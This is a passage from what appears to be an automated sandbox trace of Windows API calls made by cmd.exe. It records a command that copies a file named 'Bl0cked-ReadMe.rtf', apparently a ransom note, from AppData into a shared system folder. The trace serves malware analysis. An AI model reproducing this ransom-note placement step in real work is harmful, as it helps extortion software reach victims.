_Env=0x4a9e423c) returned 0 [0127.064] GetCurrentThreadId () returned 0xfc8 [0127.064] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc8) returned 0x38 [0127.064] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.064] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.064] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.064] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.065] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf964 | out: phkResult=0x1cf964*=0x0) returned 0x2 [0127.065] VirtualQuery (in: lpAddress=0x1cf99b, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.065] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf934, dwLength=0x1c | out: lpBuffer=0x1cf934*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0127.065] GetConsoleOutputCP () returned 0x1b5 [0127.065] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.065] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.065] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.065] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.065] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.066] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.066] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.066] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.066] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.066] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.066] GetEnvironmentStringsW () returned 0x310198* [0127.066] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0127.067] GetEnvironmentStringsW () returned 0x310198* [0127.067] FreeEnvironmentStringsW (penv=0x310198) returned 1 [0127.067] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0xc0, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegCloseKey (hKey=0x40) returned 0x0 [0127.067] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce8d4 | out: phkResult=0x1ce8d4*=0x40) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x40, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x1, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x0, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x4, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x4) returned 0x0 [0127.067] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8dc, lpData=0x1ce8e0, lpcbData=0x1ce8d8*=0x1000 | out: lpType=0x1ce8dc*=0x0, lpData=0x1ce8e0*=0x9, lpcbData=0x1ce8d8*=0x1000) returned 0x2 [0127.068] RegCloseKey (hKey=0x40) returned 0x0 [0127.068] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886361 [0127.068] srand (_Seed=0x5b886361) [0127.068] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"" [0127.068] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf\"" [0127.068] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.068] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3118f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.068] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.068] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.068] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.068] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.068] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.069] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.069] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.069] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.069] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.069] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.069] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.069] GetEnvironmentStringsW () returned 0x3122e8* [0127.069] FreeEnvironmentStringsW (penv=0x3122e8) returned 1 [0127.069] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.069] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.069] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.069] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.069] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.069] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.069] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.069] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.069] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.069] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.069] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf6a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.069] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf6a0, lpFilePart=0x1cf69c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf69c*="Desktop") returned 0x18 [0127.069] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.070] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x310028 [0127.070] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0127.070] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x310028 [0127.070] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0127.070] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf41c | out: lpFindFileData=0x1cf41c) returned 0x310028 [0127.070] FindClose (in: hFindFile=0x310028 | out: hFindFile=0x310028) returned 1 [0127.070] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.070] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.070] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.070] GetEnvironmentStringsW () returned 0x312b08* [0127.071] FreeEnvironmentStringsW (penv=0x312b08) returned 1 [0127.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.071] GetConsoleOutputCP () returned 0x1b5 [0127.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.071] GetUserDefaultLCID () returned 0x409 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="0") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf7e0, cchData=128 | out: lpLCData="1") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.072] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.072] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.073] GetConsoleTitleW (in: lpConsoleTitle=0x3008f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.074] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.074] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.074] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.075] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.075] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.075] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.075] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.075] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.075] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.075] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.079] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.079] GetFileType (hFile=0x7) returned 0x2 [0127.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.131] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf6d8 | out: lpMode=0x1cf6d8) returned 1 [0127.131] _dup (_FileHandle=1) returned 3 [0127.132] _close (_FileHandle=1) returned 0 [0127.132] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0127.132] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf6a8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0127.134] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0127.134] GetConsoleTitleW (in: lpConsoleTitle=0x1cf4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.134] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0127.134] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0127.134] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0127.134] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0127.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.135] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf03c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf03c) returned 0x300e90 [0127.135] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0127.135] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0127.135] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0127.135] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cdf48, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0127.136] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] GetFileType (hFile=0x54) returned 0x1 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1cdfa0 | out: lpFileSizeHigh=0x1cdfa0*=0x0) returned 0x1632 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.136] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.136] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.136] GetFileType (hFile=0x4c) returned 0x1 [0127.136] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.136] GetFileType (hFile=0x4c) returned 0x1 [0127.136] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.136] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.137] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.137] GetFileType (hFile=0x4c) returned 0x1 [0127.137] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.139] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.140] 